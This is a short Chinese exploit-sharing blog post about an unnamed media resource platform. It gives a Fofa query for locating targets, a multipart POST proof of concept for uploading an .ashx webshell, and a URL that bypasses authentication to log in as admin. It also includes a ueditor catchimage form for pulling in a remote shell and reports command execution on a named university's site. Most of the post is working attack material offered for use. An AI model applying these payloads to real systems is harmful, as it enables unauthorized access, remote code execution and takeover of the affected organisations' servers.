您的位置 首页 0day

0day 2021.3.19 某媒体资源平台 权限绕过+文件上传(前台后台各一个)

2021-3-19-小小小月球 Fofa语法: /Widget/common/Service/CommonWi…

2021-3-19-小小小月球

Fofa语法:

/Widget/common/Service/CommonWidgetService.asmx/Categorylist

付费版插件存在任意文件上传(需要登录)

用户注册链接: Module/SSO/SJS_Register.aspx

漏洞位置

/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx

任意文件上传验证

返回就是存在

构造poc

POST:

------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data; name="fileType"

2222.ashx
------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data; name="file"; filename="2222.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundaryxJBEcLK1xdylqBhP—

已南开为例,上传成功执行命令

在送一处直接登录管理员

/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0

直接管理员(有的要登录有的则不要)

2.文件上传ueditor编辑器

漏洞位置: \Component\ueditor\net\controller.ashx?action=catchimage&encode=utf-8

利用poc:

<form action="url" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/1278/
考研勇士 LiAoRJ

作者: 考研勇士

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部